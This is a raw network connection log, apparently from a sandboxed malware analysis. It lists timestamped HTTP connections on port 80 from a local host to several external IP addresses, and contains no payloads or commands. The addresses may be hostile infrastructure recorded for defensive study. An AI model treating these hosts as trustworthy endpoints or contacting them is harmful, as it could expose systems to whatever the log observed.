                                                                                                                                              Oct 4, 2024 08:08:27.522500038 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:28.729435921 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:29.746896982 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:30.054075003 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.054208994 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:30.061762094 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:30.383567095 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.383661985 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.383673906 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.383804083 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:31.572616100 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.593471050 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.895715952 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:32.895852089 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.904025078 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.904107094 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:33.204977036 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205120087 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205219984 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205321074 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205699921 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205710888 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.206346989 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:34.415692091 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:35.433118105 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:35.738332033 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:35.738575935 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:35.743563890 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:36.050376892 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:36.133718967 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:36.133734941 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:36.134021997 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:36.135947943 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:36.440352917 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:41.328427076 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:41.427876949 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:41.428152084 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:41.435738087 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:41.535540104 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:42.464061022 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:42.464191914 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:42.945103884 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:43.044286966 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:43.962507010 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:44.062285900 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:44.062469959 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:44.070035934 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:44.169867992 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:44.171840906 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:44.171972990 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:45.585139036 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:45.684637070 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.602581024 CEST4975880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:46.701869965 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.702054024 CEST4975880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:46.709666014 CEST4975880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:46.709712982 CEST4975880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:46.809336901 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.809444904 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.809457064 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.809467077 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.809557915 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.809568882 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.809663057 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:48.225224018 CEST4975880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:48.367655993 CEST80497583.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:49.242609978 CEST4975980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:49.342556000 CEST80497593.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:49.342868090 CEST4975980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:49.347965002 CEST4975980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:49.448402882 CEST80497593.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:49.454838991 CEST80497593.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:49.454927921 CEST80497593.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:49.455131054 CEST4975980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:49.457017899 CEST4975980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:49.460371017 CEST80497593.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:49.460599899 CEST4975980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:09:45.584420919 CEST4977380192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:45.584481001 CEST8049773103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:45.584513903 CEST8049773103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:45.584526062 CEST8049773103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:45.584537029 CEST8049773103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:45.584547043 CEST8049773103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:45.584595919 CEST4977380192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:45.584666967 CEST4977380192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:45.585818052 CEST8049773103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:45.586005926 CEST4977380192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:46.431068897 CEST4977380192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:47.448826075 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:47.779953957 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:47.780335903 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:47.788780928 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:47.788830042 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:47.788882017 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:48.119823933 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.119839907 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428112030 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428129911 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428141117 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428153038 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428165913 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428184986 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428268909 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428277016 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428359985 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:48.428437948 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428440094 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428472042 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:48.428592920 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:48.428634882 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:48.428896904 CEST8049774103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:48.428981066 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:49.289937019 CEST4977480192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:50.307265043 CEST4977580192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:50.630234957 CEST8049775103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:50.630507946 CEST4977580192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:50.636223078 CEST4977580192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:50.959203005 CEST8049775103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:51.194473982 CEST8049775103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:51.194533110 CEST8049775103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:51.194765091 CEST4977580192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:51.196940899 CEST4977580192.168.11.20103.21.221.4
                                                                                                                                              Oct 4, 2024 08:09:51.519685030 CEST8049775103.21.221.4192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:57.307915926 CEST4977680192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:09:57.583960056 CEST8049776133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:57.584142923 CEST4977680192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:09:57.592662096 CEST4977680192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:09:57.888267040 CEST8049776133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:57.888282061 CEST8049776133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:57.888410091 CEST4977680192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:09:59.100193024 CEST4977680192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:00.117628098 CEST4977780192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:00.397376060 CEST8049777133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:00.397556067 CEST4977780192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:00.405117035 CEST4977780192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:00.688692093 CEST8049777133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:00.688756943 CEST8049777133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:00.688884974 CEST4977780192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:01.912004948 CEST4977780192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:02.929493904 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:03.208884954 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.209160089 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:03.216897011 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:03.216944933 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:03.216995955 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:03.496551037 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.496635914 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.496747017 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.496875048 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.566906929 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.566920042 CEST8049778133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:03.567158937 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:04.723917961 CEST4977880192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:05.741420984 CEST4977980192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:06.020979881 CEST8049779133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:06.021210909 CEST4977980192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:06.026305914 CEST4977980192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:06.308583021 CEST8049779133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:06.308597088 CEST8049779133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:06.308860064 CEST4977980192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:06.310751915 CEST4977980192.168.11.20133.130.35.90
                                                                                                                                              Oct 4, 2024 08:10:06.590352058 CEST8049779133.130.35.90192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.435551882 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:11.589242935 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.589514971 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:11.597064972 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:11.750936031 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.751032114 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.751188040 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.751332045 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:11.751399040 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.751481056 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.751696110 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:11.751749992 CEST8049780137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.751842022 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:13.112670898 CEST4978080192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.130470991 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.283752918 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.283879042 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.291415930 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.444458961 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.444969893 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445086956 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445208073 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445249081 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.445267916 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445322990 CEST8049781137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:14.445393085 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:14.445511103 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:15.799649000 CEST4978180192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.817070961 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.970839977 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:16.970983982 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.978709936 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:16.978745937 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:17.132852077 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.132863045 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.132872105 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.132934093 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133054972 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133064032 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133213043 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133332014 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133476019 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:17.133799076 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133884907 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.133896112 CEST8049782137.175.33.56192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:17.134057045 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:10:18.486531973 CEST4978280192.168.11.20137.175.33.56
                                                                                                                                              Oct 4, 2024 08:11:34.667814016 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:34.667996883 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:34.675734043 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:34.775960922 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:35.698299885 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:35.698478937 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:36.188082933 CEST4979680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:36.291033983 CEST80497963.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.205528975 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:37.309340000 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.309519053 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:37.317085028 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:37.416981936 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.424069881 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:37.424218893 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:38.828165054 CEST4979780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:38.932383060 CEST80497973.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:39.845571995 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.945408106 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:39.945555925 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.954304934 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.954355001 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:39.954404116 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:40.062774897 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062846899 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062855005 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062864065 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062979937 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062988043 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.062995911 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.971565008 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:40.971707106 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:41.468214035 CEST4979880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:41.567713976 CEST80497983.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.485656023 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.584961891 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.585113049 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.590176105 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.689469099 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.691457033 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.691566944 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.691843987 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.693754911 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.697814941 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:42.698019981 CEST4979980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:11:42.792893887 CEST80497993.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:47.703289032 CEST4980080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:47.802707911 CEST804980084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:47.802826881 CEST4980080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:47.810385942 CEST4980080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:47.910540104 CEST804980084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:47.910552025 CEST804980084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:50.344727993 CEST4980180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:50.444432020 CEST804980184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:50.444612026 CEST4980180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:50.452119112 CEST4980180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:50.552637100 CEST804980184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:50.552732944 CEST804980184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:52.983656883 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.083967924 CEST804980284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:53.084136009 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.091892004 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.091913939 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.092005968 CEST4980280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:53.193011045 CEST804980284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:53.193104982 CEST804980284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.623394966 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.723782063 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.724046946 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.729990959 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.831161976 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831248999 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831346989 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831407070 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831487894 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831624985 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.831748962 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831762075 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831794977 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.831851959 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831904888 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.831959009 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:11:55.832132101 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.832132101 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.834855080 CEST4980380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:11:55.934484959 CEST804980384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:00.842451096 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:00.996315002 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:00.996603012 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:01.004034996 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:01.157473087 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:01.158198118 CEST804980454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:01.158207893 CEST804980454.67.87.110192.168.11.20
